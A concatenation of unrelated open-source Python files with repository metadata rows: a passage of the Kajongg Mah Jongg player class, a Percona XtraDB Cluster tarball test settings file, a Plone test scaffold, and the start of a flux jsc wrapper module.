def bonusTiles(): # pylint: disable=E0202
"""a readonly tuple"""
def fget(self):
# pylint: disable=W0212
return tuple(self.__bonusTiles)
return property(**locals())
@apply
def concealedTileNames(): # pylint: disable=E0202
"""a readonly tuple"""
def fget(self):
# pylint: disable=W0212
return tuple(self.__concealedTileNames)
return property(**locals())
@apply
def exposedMelds(): # pylint: disable=E0202
"""a readonly tuple"""
def fget(self):
# pylint: disable=W0212
return tuple(self.__exposedMelds)
return property(**locals())
@apply
def concealedMelds(): # pylint: disable=E0202
"""a readonly tuple"""
def fget(self):
# pylint: disable=W0212
return tuple(self.__concealedMelds)
return property(**locals())
@apply
def mayWin(): # pylint: disable=E0202
"""a readonly tuple"""
def fget(self):
# pylint: disable=W0212
return self.__mayWin
def fset(self, value):
# pylint: disable=W0212
if self.__mayWin != value:
self.__mayWin = value
self.__hand = None
return property(**locals())
@apply
def lastSource(): # pylint: disable=E0202
"""the source of the last tile the player got"""
def fget(self):
# pylint: disable=W0212
return self.__lastSource
def fset(self, lastSource):
# pylint: disable=W0212
self.__lastSource = lastSource
if lastSource == 'd' and not self.game.wall.living:
self.__lastSource = 'Z'
if lastSource == 'w' and not self.game.wall.living:
self.__lastSource = 'z'
return property(**locals())
@apply
def nameid():
"""the name id of this player"""
def fget(self):
return Players.allIds[self.name]
return property(**locals())
@apply
def localName():
"""the localized name of this player"""
def fget(self):
return m18nc('kajongg, name of robot player, to be translated', self.name)
return property(**locals())
def hasManualScore(self): # pylint: disable=R0201
"""virtual: has a manual score been entered for this game?"""
# pylint does not recognize that this is overridden by
# an implementation that needs self
return False
@apply
def handTotal():
"""the hand total of this player"""
def fget(self):
if self.hasManualScore():
spValue = InternalParameters.field.scoringDialog.spValues[self.idx]
return spValue.value()
if not self.game.isScoringGame() and not self.game.winner:
return 0
return self.hand.total()
return property(**locals())
@apply
def balance():
"""the balance of this player"""
def fget(self):
# pylint: disable=W0212
return self.__balance
def fset(self, balance):
# pylint: disable=W0212
self.__balance = balance
self.__payment = 0
return property(**locals())
@apply
def values():
"""the values that are still needed after ending a hand"""
def fget(self):
return self.name, self.wind, self.balance, self.voice
def fset(self, values):
self.name = values[0]
self.wind = values[1]
self.balance = values[2]
self.voice = values[3]
return property(**locals())
def getsPayment(self, payment):
"""make a payment to this player"""
self.__balance += payment
self.__payment += payment
@apply
def payment():
"""the payments for the current hand"""
def fget(self):
# pylint: disable=W0212
return self.__payment
def fset(self, payment):
assert payment == 0
self.__payment = 0
return property(**locals())
def __repr__(self):
return u'{name:<10} {wind}'.format(name=self.name[:10], wind=self.wind)
def __unicode__(self):
return u'{name:<10} {wind}'.format(name=self.name[:10], wind=self.wind)
def pickedTile(self, deadEnd, tileName=None):
"""got a tile from wall"""
self.game.activePlayer = self
tile = self.game.wall.deal([tileName], deadEnd=deadEnd)[0]
self.lastTile = tile.element
self.addConcealedTiles(tile)
if deadEnd:
self.lastSource = 'e'
else:
self.game.lastDiscard = None
self.lastSource = 'w'
return tile
def addConcealedTiles(self, data):
"""add to my tiles and sync the hand board"""
assert isinstance(data, (Tile, list)), data
assert not self.game.isScoringGame()
if isinstance(data, Tile):
data = list([data])
for tile in data:
assert isinstance(tile, Tile)
tileName = tile.element
if tile.isBonus():
self.__bonusTiles.append(tile)
else:
assert tileName.istitle()
self.__concealedTileNames.append(tileName)
self.__hand = None
if data:
self.syncHandBoard(adding=data)
def addMeld(self, meld):
"""add meld to this hand in a scoring game
also used for the Game instance maintained by the server"""
if len(meld.tiles) == 1 and meld[0].isBonus():
self.__bonusTiles.append(meld[0])
elif meld.state == CONCEALED and not meld.isKong():
self.__concealedMelds.append(meld)
else:
self.__exposedMelds.append(meld)
self.__hand = None
def remove(self, tile=None, meld=None):
"""remove from my melds or tiles"""
tiles = [tile] if tile else meld.tiles
if len(tiles) == 1 and tiles[0].isBonus():
self.__bonusTiles.remove(tiles[0])
self.__hand = None
self.syncHandBoard()
return
if tile:
assert not meld, (str(tile), str(meld))
assert not self.game.isScoringGame()
tileName = tile.element
try:
self.__concealedTileNames.remove(tileName)
except ValueError:
raise Exception('removeTiles(%s): tile not in concealed %s' % \
(tileName, ''.join(self.__concealedTileNames)))
else:
self.removeMeld(meld)
self.__hand = None
self.syncHandBoard()
def removeMeld(self, meld):
"""remove a meld from this hand in a scoring game"""
assert self.game.isScoringGame()
for melds in [self.__concealedMelds, self.__exposedMelds]:
for idx, myTile in enumerate(melds):
if id(myTile) == id(meld):
melds.pop(idx)
self.__hand = None
def hasConcealedTiles(self, tileNames, within=None):
"""do I have those concealed tiles?"""
if within is None:
within = self.__concealedTileNames
within = within[:]
for tileName in tileNames:
if tileName not in within:
return False
within.remove(tileName)
return True
def showConcealedTiles(self, tileNames, show=True):
"""show or hide tileNames"""
if not self.game.playOpen and self != self.game.myself:
if not isinstance(tileNames, (list, tuple)):
tileNames = [tileNames]
assert len(tileNames) <= len(self.__concealedTileNames), \
'%s: showConcealedTiles %s, we have only %s' % (self, tileNames, self.__concealedTileNames)
for tileName in tileNames:
src, dst = ('Xy', tileName) if show else (tileName, 'Xy')
assert src != dst, (self, src, dst, tileNames, self.__concealedTileNames)
if not src in self.__concealedTileNames:
logException( '%s: showConcealedTiles(%s): %s not in %s.' % \
(self, tileNames, src, self.__concealedTileNames))
idx = self.__concealedTileNames.index(src)
self.__concealedTileNames[idx] = dst
self.__hand = None
self.syncHandBoard()
def showConcealedMelds(self, concealedMelds, ignoreDiscard=None):
"""the server tells how the winner shows and melds his
concealed tiles. In case of error, return message and arguments"""
for part in concealedMelds.split():
meld = Meld(part)
for pair in meld.pairs:
if pair == ignoreDiscard:
ignoreDiscard = None
else:
if not pair in self.__concealedTileNames:
msg = m18nE('%1 claiming MahJongg: She does not really have tile %2')
return msg, self.name, pair
self.__concealedTileNames.remove(pair)
self.addMeld(meld)
if self.__concealedTileNames:
msg = m18nE('%1 claiming MahJongg: She did not pass all concealed tiles to the server')
return msg, self.name
self.__hand = None
def hasExposedPungOf(self, tileName):
"""do I have an exposed Pung of tileName?"""
for meld in self.__exposedMelds:
if meld.pairs == [tileName.lower()] * 3:
return True
return False
def robTile(self, tileName):
"""used for robbing the kong"""
assert tileName.istitle()
tileName = tileName.lower()
for meld in self.__exposedMelds:
if tileName in meld.pairs:
meld.pairs.remove(tileName)
meld.meldtype = PUNG
self.visibleTiles[tileName] -= 1
break
else:
raise Exception('robTile: no meld found with %s' % tileName)
if InternalParameters.field:
hbTiles = self.handBoard.tiles
self.game.lastDiscard = [x for x in hbTiles if x.element == tileName][-1]
# remove from board of robbed player, otherwise syncHandBoard would
# not fix display for the robbed player
self.game.lastDiscard.setBoard(None)
self.syncHandBoard()
else:
self.game.lastDiscard = Tile(tileName)
self.game.lastDiscard.element = self.game.lastDiscard.upper()
def scoreMatchesServer(self, score):
"""do we compute the same score as the server does?"""
if score is None:
return True
if 'Xy' in self.__concealedTileNames:
return True
if str(self.hand) == score:
return True
self.game.debug('%s localScore:%s' % (self, self.hand))
self.game.debug('%s serverScore:%s' % (self, score))
logWarning('Game %s: client and server disagree about scoring, see logfile for details' % self.game.seed)
return False
def mustPlayDangerous(self, exposing=None):
"""returns True if the player has no choice, otherwise False.
Exposing may be a meld which will be exposed before we might
play dangerous"""
if self == self.game.activePlayer and exposing and len(exposing) == 4:
# declaring a kong is never dangerous because we get
# an unknown replacement
return False
afterExposed = list(x.lower() for x in self.__concealedTileNames)
if exposing:
exposing = exposing[:]
if self.game.lastDiscard:
# if this is about claiming a discarded tile, ignore it
# the player who discarded it is responsible
exposing.remove(self.game.lastDiscard.element)
for tileName in exposing:
if tileName.lower() in afterExposed:
# the "if" is needed for claimed pung
afterExposed.remove(tileName.lower())
return all(self.game.dangerousFor(self, x) for x in afterExposed)
def exposeMeld(self, meldTiles, calledTile=None):
"""exposes a meld with meldTiles: removes them from concealedTileNames,
adds the meld to exposedMelds and returns it
calledTile: we got the last tile for the meld from discarded, otherwise
from the wall"""
game = self.game
game.activePlayer = self
allMeldTiles = meldTiles[:]
if calledTile:
allMeldTiles.append(calledTile.element if isinstance(calledTile, Tile) else calledTile)
if len(allMeldTiles) == 4 and allMeldTiles[0].islower():
tile0 = allMeldTiles[0].lower()
# we are adding a 4th tile to an exposed pung
self.__exposedMelds = [meld for meld in self.__exposedMelds if meld.pairs != [tile0] * 3]
meld = Meld(tile0 * 4)
self.__concealedTileNames.remove(allMeldTiles[3])
self.visibleTiles[tile0] += 1
else:
allMeldTiles = sorted(allMeldTiles) # needed for Chow
meld = Meld(allMeldTiles)
for meldTile in meldTiles:
self.__concealedTileNames.remove(meldTile)
for meldTile in allMeldTiles:
self.visibleTiles[meldTile.lower()] += 1
meld.expose(bool(calledTile))
self.__exposedMelds.append(meld)
self.__hand = None
game.computeDangerous(self)
adding = [calledTile] if calledTile else None
self.syncHandBoard(adding=adding)
return meld
def findDangerousTiles(self):
"""update the list of dangerous tile"""
pName = self.localName
dangerous = list()
expMeldCount = len(self.__exposedMelds)
if expMeldCount >= 3:
if all(x in elements.greenHandTiles for x in self.visibleTiles):
dangerous.append((elements.greenHandTiles,
m18n('Player %1 has 3 or 4 exposed melds, all are green', pName)))
color = defaultdict.keys(self.visibleTiles)[0][0]
# see http://www.logilab.org/ticket/23986
assert color.islower(), self.visibleTiles
if color in 'sbc':
if all(x[0] == color for x in self.visibleTiles):
suitTiles = set([color+x for x in '123456789'])
if self.visibleTiles.count(suitTiles) >= 9:
dangerous.append((suitTiles, m18n('Player %1 may try a True Color Game', pName)))
elif all(x[1] in '19' for x in self.visibleTiles):
dangerous.append((elements.terminals,
m18n('Player %1 may try an All Terminals Game', pName)))
if expMeldCount >= 2:
windMelds = sum(self.visibleTiles[x] >=3 for x in elements.winds)
dragonMelds = sum(self.visibleTiles[x] >=3 for x in elements.dragons)
windsDangerous = dragonsDangerous = False
if windMelds + dragonMelds == expMeldCount and expMeldCount >= 3:
windsDangerous = dragonsDangerous = True
windsDangerous = windsDangerous or windMelds >= 3
dragonsDangerous = dragonsDangerous or dragonMelds >= 2
if windsDangerous:
dangerous.append((set(x for x in elements.winds if x not in self.visibleTiles),
m18n('Player %1 exposed many winds', pName)))
if dragonsDangerous:
dangerous.append((set(x for x in elements.dragons if x not in self.visibleTiles),
m18n('Player %1 exposed many dragons', pName)))
self.dangerousTiles = dangerous
if dangerous and Debug.dangerousGame:
self.game.debug('dangerous:%s' % dangerous)
def popupMsg(self, msg):
"""virtual: show popup on display"""
pass
def hidePopup(self):
"""virtual: hide popup on display"""
pass
def syncHandBoard(self, adding=None):
"""virtual: synchronize display"""
pass
def colorizeName(self):
"""virtual: colorize Name on wall"""
pass
def getsFocus(self, dummyResults=None):
"""virtual: player gets focus on his hand"""
pass
def mjString(self, asWinner=False):
"""compile hand info into a string as needed by the scoring engine"""
game = self.game
assert game
winds = self.wind.lower() + 'eswn'[game.roundsFinished % 4]
wonChar = 'm'
lastSource = ''
declaration = ''
if asWinner or self == game.winner:
wonChar = 'M'
lastSource = self.lastSource
if self.originalCall:
declaration = 'a'
if not self.mayWin:
wonChar = 'x'
return ''.join([wonChar, winds, lastSource, declaration])
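    # Illustrative example (hypothetical game state): for East winning in the
    # south round off a discard after declaring Original Call, this returns
    # 'M' + 'es' + 'd' + 'a' == 'Mesda'; a non-winner who may still win
    # yields e.g. 'mes'.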
def sortMeldsByX(self):
"""sorts the melds by their position on screen"""
if self.game.isScoringGame():
# in a real game, the player melds do not have tiles
self.__concealedMelds = sorted(self.__concealedMelds, key=lambda x: x[0].xoffset)
self.__exposedMelds = sorted(self.__exposedMelds, key=lambda x: x[0].xoffset)
def makeTileKnown(self, tileName):
"""used when somebody else discards a tile"""
assert self.__concealedTileNames[0] == 'Xy'
self.__concealedTileNames[0] = tileName
self.__hand = None
def computeHand(self, withTile=None, robbedTile=None, dummy=None, asWinner=False):
"""returns Hand for this player"""
assert not (self.__concealedMelds and self.__concealedTileNames)
assert not isinstance(self.lastTile, Tile)
assert not isinstance(withTile, Tile)
melds = ['R' + ''.join(self.__concealedTileNames)]
if withTile:
melds[0] += withTile
melds.extend(x.joined for x in self.__exposedMelds)
melds.extend(x.joined for x in self.__concealedMelds)
melds.extend(''.join(x.element) for x in self.__bonusTiles)
mjString = self.mjString(asWinner)
melds.append(mjString)
if mjString.startswith('M') and (withTile or self.lastTile):
melds.append('L%s%s' % (withTile or self.lastTile, self.lastMeld.joined))
if self.game.eastMJCount == 8 and self == self.game.winner and self.wind == 'E':
            # eastMJCount will only be incremented later, in saveHand
rules = [self.game.ruleset.findRule('XEAST9X')]
else:
rules = None
return Hand.cached(self, ' '.join(melds), computedRules=rules, robbedTile=robbedTile)
def computeNewHand(self):
"""returns the new hand. Same as current unless we need to discard. In that
case, make an educated guess about the discard. For player==game.myself, use
the focussed tile."""
hand = self.hand
if hand and hand.tileNames and self.__concealedTileNames:
if hand.lenOffset == 1 and not hand.won:
if self == self.game.myself:
removeTile = self.handBoard.focusTile.element
elif self.lastTile:
removeTile = self.lastTile
else:
removeTile = self.__concealedTileNames[0]
assert removeTile[0] not in 'fy', 'hand:%s remove:%s lastTile:%s' % (
hand, removeTile, self.lastTile)
hand -= removeTile
assert not hand.lenOffset
return hand
def possibleChows(self, tileName=None, within=None):
"""returns a unique list of lists with possible claimable chow combinations"""
exposedChows = [x for x in self.__exposedMelds if x.isChow()]
if len(exposedChows) >= self.game.ruleset.maxChows:
return []
if tileName is None:
tileName = self.game.lastDiscard.element
if within is None:
within = self.__concealedTileNames
within = within[:]
within.append(tileName)
return hasChows(tileName, within)
def exposedChows(self):
"""returns a list of exposed chows"""
return [x for x in self.__exposedMelds if x.isChow()]
def possibleKongs(self):
"""returns a unique list of lists with possible kong combinations"""
kongs = []
if self == self.game.activePlayer:
# declaring a kong
for tileName in set([x for x in self.__concealedTileNames if x[0] not in 'fy']):
if self.__concealedTileNames.count(tileName) == 4:
kongs.append([tileName] * 4)
elif self.__concealedTileNames.count(tileName) == 1 and \
tileName.lower() * 3 in list(x.joined for x in self.__exposedMelds):
kongs.append([tileName.lower()] * 3 + [tileName])
if self.game.lastDiscard:
# claiming a kong
discardName = self.game.lastDiscard.element.capitalize()
if self.__concealedTileNames.count(discardName) == 3:
kongs.append([discardName] * 4)
return kongs
def declaredMahJongg(self, concealed, withDiscard, lastTile, lastMeld):
"""player declared mah jongg. Determine last meld, show concealed tiles grouped to melds"""
assert not isinstance(lastTile, Tile)
lastMeld = Meld(lastMeld) # do not change the original!
self.game.winner = self
if withDiscard:
self.lastTile = withDiscard
self.lastMeld = lastMeld
assert withDiscard == self.game.lastDiscard.element, 'withDiscard: %s lastDiscard: %s' % (
withDiscard, self.game.lastDiscard.element)
self.addConcealedTiles(self.game.lastDiscard)
melds = [Meld(x) for x in concealed.split()]
if self.lastSource != 'k': # robbed the kong
self.lastSource = 'd'
# the last claimed meld is exposed
assert lastMeld in melds, '%s: concealed=%s melds=%s lastMeld=%s lastTile=%s withDiscard=%s' % (
self.__concealedTileNames, concealed,
meldsContent(melds), ''.join(lastMeld.pairs), lastTile, withDiscard)
melds.remove(lastMeld)
self.lastTile = self.lastTile.lower()
lastMeld.pairs.toLower()
self.__exposedMelds.append(lastMeld)
for tileName in lastMeld.pairs:
self.visibleTiles[tileName] += 1
else:
melds = [Meld(x) for x in concealed.split()]
self.lastTile = lastTile
self.lastMeld = lastMeld
self.__concealedMelds = melds
self.__concealedTileNames = []
self.__hand = None
self.syncHandBoard()
def scoringString(self):
"""helper for HandBoard.__str__"""
if self.__concealedMelds:
parts = [x.joined for x in self.__concealedMelds + self.__exposedMelds]
else:
parts = [''.join(self.__concealedTileNames)]
parts.extend([x.joined for x in self.__exposedMelds])
parts.extend(''.join(x.element) for x in self.__bonusTiles)
return ' '.join(parts)
def others(self):
"""a list of the other 3 players"""
return (x for x in self.game.players if x != self)
def tileAvailable(self, tileName, hand):
"""a count of how often tileName might still appear in the game
supposing we have hand"""
visible = self.game.discardedTiles.count([tileName.lower()])
for player in self.others():
visible += player.visibleTiles.count([tileName.capitalize()])
visible += player.visibleTiles.count([tileName.lower()])
for pair in hand.tileNames:
if pair.lower() == tileName.lower():
visible += 1
return 4 - visible
def violatesOriginalCall(self, tileName=None):
"""called if discarding tileName (default=just discarded tile)
violates the Original Call"""
if not self.originalCall or not self.mayWin:
return False
if tileName is None:
if len(self.discarded) < 2:
return False
tileName = self.discarded[-1]
if self.lastTile.lower() != tileName.lower():
if Debug.originalCall:
self.game.debug('%s would violate OC with %s, lastTile=%s' % (self, tileName, self.lastTile))
return True
return False
|
jsj2008/kdegames
|
kajongg/src/player.py
|
Python
|
gpl-2.0
| 30,828
|
#!/usr/bin/env python3
import os
base_dir = os.getenv('BASE_DIR')
pxc_version = os.getenv('PXC_VERSION')
pxc_revision = os.getenv('PXC_REVISION')
pxc57_pkg_version = os.getenv('PXC57_PKG_VERSION')
wsrep_version = os.getenv('WSREP_VERSION')
glibc_version = os.getenv('GLIBC_VERSION')
pxc_version_percona = pxc_version.split('-')[0]
pxc_version_major = pxc_version_percona.split('.')[0] + '.' + pxc_version_percona.split('.')[1]
if pxc_version_major == "5.7":
print(pxc_version)
print(pxc57_pkg_version)
pxc57_client_version = pxc57_pkg_version.split('-')[0] + '-' + pxc57_pkg_version.split('-')[1][3:]
pxc57_server_version_norel = pxc57_pkg_version.split('-')[0] + '-' + pxc57_pkg_version.split('-')[1][3:] + '-' + pxc57_pkg_version.split('-')[2].split('.')[0]
pxc57_server_version = pxc57_pkg_version.split('-')[0] + '-' + pxc57_pkg_version.split('-')[1] + '-' + pxc57_pkg_version.split('-')[2].split('.')[0]
pxc57_client_version_using = "6.0" if glibc_version == "2.12" else "6.2"
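# Worked example for the 5.7 branch above (input value hypothetical): with
# PXC57_PKG_VERSION='5.7.39-rel42-31.1.2' the splits yield
#   pxc57_client_version = '5.7.39-42' (the 'rel' prefix stripped),
#   pxc57_server_version_norel = '5.7.39-42-31',
#   pxc57_server_version = '5.7.39-rel42-31'.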
# 8.0
pxc80_binaries = [
'bin/garbd',
'bin/pxc_extra/pxb-2.4/bin/xtrabackup', 'bin/pxc_extra/pxb-2.4/bin/xbcloud',
'bin/pxc_extra/pxb-2.4/bin/xbcrypt', 'bin/pxc_extra/pxb-2.4/bin/xbstream',
'bin/pxc_extra/pxb-8.0/bin/xtrabackup', 'bin/pxc_extra/pxb-8.0/bin/xbcloud',
'bin/pxc_extra/pxb-8.0/bin/xbcrypt', 'bin/pxc_extra/pxb-8.0/bin/xbstream',
'bin/mysql', 'bin/mysqld', 'bin/mysqladmin', 'bin/mysqlbinlog',
'bin/mysqldump', 'bin/mysqlimport', 'bin/mysqlpump', 'bin/mysqlshow',
'bin/mysqlslap', 'bin/mysqlcheck', 'bin/mysql_config_editor',
'bin/mysqlrouter', 'bin/mysqlrouter_passwd', 'bin/mysqlrouter_plugin_info', 'bin/mysql_secure_installation', 'bin/mysql_ssl_rsa_setup',
'bin/mysql_upgrade', 'bin/mysql_tzinfo_to_sql'
]
pxc80_executables = pxc80_binaries + [
'bin/clustercheck', 'bin/wsrep_sst_common', 'bin/wsrep_sst_xtrabackup-v2',
'bin/pxc_extra/pxb-2.4/bin/xbcloud_osenv',
'bin/pxc_extra/pxb-8.0/bin/xbcloud_osenv',
'bin/ps-admin',
'bin/mysqldumpslow',
'bin/mysql_config',
]
pxc80_plugins = (
('audit_log','audit_log.so'),('mysql_no_login','mysql_no_login.so'),('validate_password','validate_password.so'),
('version_tokens','version_token.so'),('rpl_semi_sync_master','semisync_master.so'),('rpl_semi_sync_slave','semisync_slave.so'),
('clone','mysql_clone.so'),('data_masking','data_masking.so')
)
pxc80_functions = (
('fnv1a_64', 'libfnv1a_udf.so', 'INTEGER'),('fnv_64', 'libfnv_udf.so', 'INTEGER'),('murmur_hash', 'libmurmur_udf.so', 'INTEGER'),
('version_tokens_set', 'version_token.so', 'STRING'),('version_tokens_show', 'version_token.so', 'STRING'),('version_tokens_edit', 'version_token.so', 'STRING'),
('version_tokens_delete', 'version_token.so', 'STRING'),('version_tokens_lock_shared', 'version_token.so', 'INT'),('version_tokens_lock_exclusive', 'version_token.so', 'INT'),
('version_tokens_unlock', 'version_token.so', 'INT'),('service_get_read_locks', 'locking_service.so', 'INT'),('service_get_write_locks', 'locking_service.so', 'INT'),
('service_release_locks', 'locking_service.so', 'INT')
)
pxc80_files = (
'lib/libgalera_smm.so', 'lib/libperconaserverclient.a', 'lib/libperconaserverclient.so.21.1.26' ,
'lib/libmysqlservices.a' , 'lib/plugin/audit_log.so',
'lib/plugin/auth_pam.so', 'lib/plugin/auth_pam_compat.so', 'lib/plugin/data_masking.so',
'lib/plugin/data_masking.ini', 'lib/plugin/keyring_file.so',
'lib/plugin/keyring_udf.so', 'lib/plugin/keyring_vault.so'
)
pxc80_symlinks = (
('lib/libcrypto.so','lib/private/libcrypto.so.1.0.2k'), ('lib/libfreebl3.so','lib/private/libfreebl3.so'),
('lib/libgcrypt.so','lib/private/libgcrypt.so.11.8.2'), ('lib/libnspr4.so','lib/private/libnspr4.so'),
('lib/libnss3.so','lib/private/libnss3.so'), ('lib/libnssutil3.so','lib/private/libnssutil3.so'),
('lib/libperconaserverclient.so','lib/libperconaserverclient.so.21.1.26'), ('lib/libplc4.so','lib/private/libplc4.so'),
('lib/libplds4.so','lib/private/libplds4.so'), ('lib/libsasl2.so','lib/private/libsasl2.so.3.0.0'),
('lib/libsmime3.so','lib/private/libsmime3.so'), ('lib/libssl.so','lib/private/libssl.so.1.0.2k'),
('lib/libssl3.so','lib/private/libssl3.so'), ('lib/libtinfo.so','lib/private/libtinfo.so.5.9'),
)
# 5.7
pxc57_binaries = [
'bin/garbd', 'bin/innochecksum', 'bin/lz4_decompress', 'bin/my_print_defaults',
'bin/myisam_ftdump','bin/myisamchk', 'bin/myisamlog', 'bin/myisampack', 'bin/mysql', 'bin/mysql_client_test',
'bin/mysql_config_editor', 'bin/mysql_install_db', 'bin/mysql_plugin', 'bin/mysql_secure_installation',
'bin/mysql_ssl_rsa_setup', 'bin/mysql_tzinfo_to_sql', 'bin/mysql_upgrade', 'bin/mysqladmin', 'bin/mysqlbinlog',
'bin/mysqlcheck', 'bin/mysqld', 'bin/mysqldump',
'bin/mysqlimport', 'bin/mysqlpump', 'bin/mysqlshow', 'bin/mysqlslap', 'bin/mysqltest', 'bin/mysqlxtest', 'bin/perror',
'bin/replace', 'bin/resolve_stack_dump',
'bin/resolveip',
'bin/zlib_decompress'
]
pxc57_executables = pxc57_binaries + [
'bin/clustercheck',
'bin/mysql_config',
'bin/mysqld_multi', 'bin/mysqld_safe', 'bin/mysqldumpslow',
'bin/ps-admin', 'bin/ps_mysqld_helper', 'bin/ps_tokudb_admin', 'bin/pyclustercheck',
'bin/wsrep_sst_common', 'bin/wsrep_sst_mysqldump', 'bin/wsrep_sst_rsync', 'bin/wsrep_sst_xtrabackup-v2',
]
pxc57_plugins = (
('audit_log','audit_log.so'),('mysql_no_login','mysql_no_login.so'),('validate_password','validate_password.so'),
('version_tokens','version_token.so'),('rpl_semi_sync_master','semisync_master.so'),
('rpl_semi_sync_slave','semisync_slave.so')
)
pxc57_functions = (
('fnv1a_64', 'libfnv1a_udf.so', 'INTEGER'),('fnv_64', 'libfnv_udf.so', 'INTEGER'),('murmur_hash', 'libmurmur_udf.so', 'INTEGER'),
('version_tokens_set', 'version_token.so', 'STRING'),('version_tokens_show', 'version_token.so', 'STRING'),('version_tokens_edit', 'version_token.so', 'STRING'),
('version_tokens_delete', 'version_token.so', 'STRING'),('version_tokens_lock_shared', 'version_token.so', 'INT'),('version_tokens_lock_exclusive', 'version_token.so', 'INT'),
('version_tokens_unlock', 'version_token.so', 'INT'),('service_get_read_locks', 'locking_service.so', 'INT'),('service_get_write_locks', 'locking_service.so', 'INT'),
('service_release_locks', 'locking_service.so', 'INT')
)
pxc57_files = (
'lib/libgalera_smm.so', 'lib/libperconaserverclient.a', 'lib/libperconaserverclient.so.20.3.23' ,
'lib/libmysqlservices.a' , 'lib/libcoredumper.a', 'lib/mysql/plugin/audit_log.so',
'lib/mysql/plugin/auth_pam.so', 'lib/mysql/plugin/auth_pam_compat.so',
'lib/mysql/plugin/keyring_file.so', 'lib/mysql/plugin/keyring_udf.so', 'lib/mysql/plugin/keyring_vault.so'
)
if glibc_version == "2.12":
pxc57_symlinks = (
('lib/libperconaserverclient.so','lib/libperconaserverclient.so.20.3.23'),
('lib/libperconaserverclient.so.20','lib/libperconaserverclient.so.20.3.23'),
('lib/libcrypto.so','lib/private/libcrypto.so.1.0.1e'),
('lib/libssl.so','lib/private/libssl.so.1.0.1e'),
('lib/libtinfo.so','lib/private/libtinfo.so.5.7'),
('lib/libsasl2.so','lib/private/libsasl2.so.2.0.23'),
('lib/libreadline.so','lib/private/libreadline.so.6.0'),
)
else:
pxc57_symlinks = (
('lib/libperconaserverclient.so','lib/libperconaserverclient.so.20.3.23'),
('lib/libperconaserverclient.so.20','lib/libperconaserverclient.so.20.3.23'),
('lib/libncurses.so','lib/private/libncurses.so.5.9'),
('lib/libcrypto.so','lib/private/libcrypto.so.1.0.2k'),
('lib/libssl.so','lib/private/libssl.so.1.0.2k'),
('lib/libtinfo.so','lib/private/libtinfo.so.5.9'),
('lib/libsasl2.so','lib/private/libsasl2.so.3.0.0'),
('lib/libreadline.so','lib/private/libreadline.so.6.2'),
)
# 5.6
pxc56_binaries = [
'bin/mysql', 'bin/mysqld', 'bin/mysqladmin', 'bin/mysqlbinlog', 'bin/mysqldump',
'bin/mysqlimport', 'bin/mysqlshow', 'bin/mysqlslap', 'bin/mysqlcheck',
'bin/mysql_config_editor', 'bin/mysql_secure_installation', 'bin/mysql_upgrade', 'bin/mysql_tzinfo_to_sql'
]
pxc56_executables = pxc56_binaries + [
'bin/mysqldumpslow'
]
pxc56_plugins = (
('audit_log','audit_log.so'),('mysql_no_login','mysql_no_login.so'),('validate_password','validate_password.so'),
('rpl_semi_sync_master','semisync_master.so'),('rpl_semi_sync_slave','semisync_slave.so')
)
pxc56_functions = (
('fnv1a_64', 'libfnv1a_udf.so', 'INTEGER'),('fnv_64', 'libfnv_udf.so', 'INTEGER'),('murmur_hash', 'libmurmur_udf.so', 'INTEGER')
)
pxc56_files = (
'lib/libHotBackup.so', 'lib/libmysqlservices.a',
'lib/libperconaserverclient.a', 'lib/libperconaserverclient.so.18.1.0' ,'lib/mysql/libjemalloc.so.1',
'lib/mysql/plugin/ha_tokudb.so', 'lib/mysql/plugin/audit_log.so',
'lib/mysql/plugin/auth_pam.so', 'lib/mysql/plugin/auth_pam_compat.so', 'lib/mysql/plugin/tokudb_backup.so'
)
pxc56_symlinks = (
('lib/libperconaserverclient.so.18','lib/libperconaserverclient.so.18.1.0'),('lib/libperconaserverclient.so','lib/libperconaserverclient.so.18.1.0'),
('lib/libperconaserverclient_r.a','lib/libperconaserverclient.a'),('lib/libperconaserverclient_r.so','lib/libperconaserverclient.so.18.1.0'),
('lib/libperconaserverclient_r.so.18','lib/libperconaserverclient.so.18.1.0'),('lib/libperconaserverclient_r.so.18.1.0','lib/libperconaserverclient.so.18.1.0')
)
#####
if pxc_version_major == '8.0':
pxc_binaries = pxc80_binaries
pxc_executables = pxc80_executables
pxc_plugins = pxc80_plugins
pxc_functions = pxc80_functions
pxc_files = pxc80_files
pxc_symlinks = pxc80_symlinks
elif pxc_version_major == '5.7':
pxc_binaries = pxc57_binaries
pxc_executables = pxc57_executables
pxc_plugins = pxc57_plugins
pxc_functions = pxc57_functions
pxc_files = pxc57_files
pxc_symlinks = pxc57_symlinks
elif pxc_version_major == '5.6':
pxc_binaries = pxc56_binaries
pxc_executables = pxc56_executables
pxc_plugins = pxc56_plugins
pxc_functions = pxc56_functions
pxc_files = pxc56_files
pxc_symlinks = pxc56_symlinks
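# Smoke-check sketch (illustrative): assumes BASE_DIR points at the unpacked
# tarball root and that PXC_VERSION matched one of the branches above.
if __name__ == '__main__':
    if base_dir:
        missing = [f for f in list(pxc_binaries) + list(pxc_files)
                   if not os.path.isfile(os.path.join(base_dir, f))]
        print('missing files: %s' % missing)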
|
Percona-QA/package-testing
|
binary-tarball-tests/pxc/settings.py
|
Python
|
gpl-2.0
| 9,953
|
import unittest
#from zope.testing import doctestunit
#from zope.component import testing
from Testing import ZopeTestCase as ztc
from Products.Five import fiveconfigure
from Products.PloneTestCase import PloneTestCase as ptc
from Products.PloneTestCase.layer import PloneSite
ptc.setupPloneSite()
import uwosh.itdocs
class TestCase(ptc.PloneTestCase):
class layer(PloneSite):
@classmethod
def setUp(cls):
fiveconfigure.debug_mode = True
ztc.installPackage(uwosh.itdocs)
fiveconfigure.debug_mode = False
@classmethod
def tearDown(cls):
pass
def test_suite():
return unittest.TestSuite([
# Unit tests
#doctestunit.DocFileSuite(
# 'README.txt', package='uwosh.itdocs',
# setUp=testing.setUp, tearDown=testing.tearDown),
#doctestunit.DocTestSuite(
# module='uwosh.itdocs.mymodule',
# setUp=testing.setUp, tearDown=testing.tearDown),
# Integration tests that use PloneTestCase
#ztc.ZopeDocFileSuite(
# 'README.txt', package='uwosh.itdocs',
# test_class=TestCase),
#ztc.FunctionalDocFileSuite(
# 'browser.txt', package='uwosh.itdocs',
# test_class=TestCase),
])
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
uwosh/uwosh.itpeoplesoftdocs
|
uwosh/itdocs/tests.py
|
Python
|
gpl-2.0
| 1,377
|
from flux.wrapper import Wrapper
from flux._jsc import ffi, lib
# Constants taken from jstatctl.h
JSC_STATE_PAIR = "state-pair"
JSC_STATE_PAIR_OSTATE = "ostate"
JSC_STATE_PAIR_NSTATE = "nstate"
JSC_RDESC = "rdesc"
JSC_RDESC_NNODES = "nnodes"
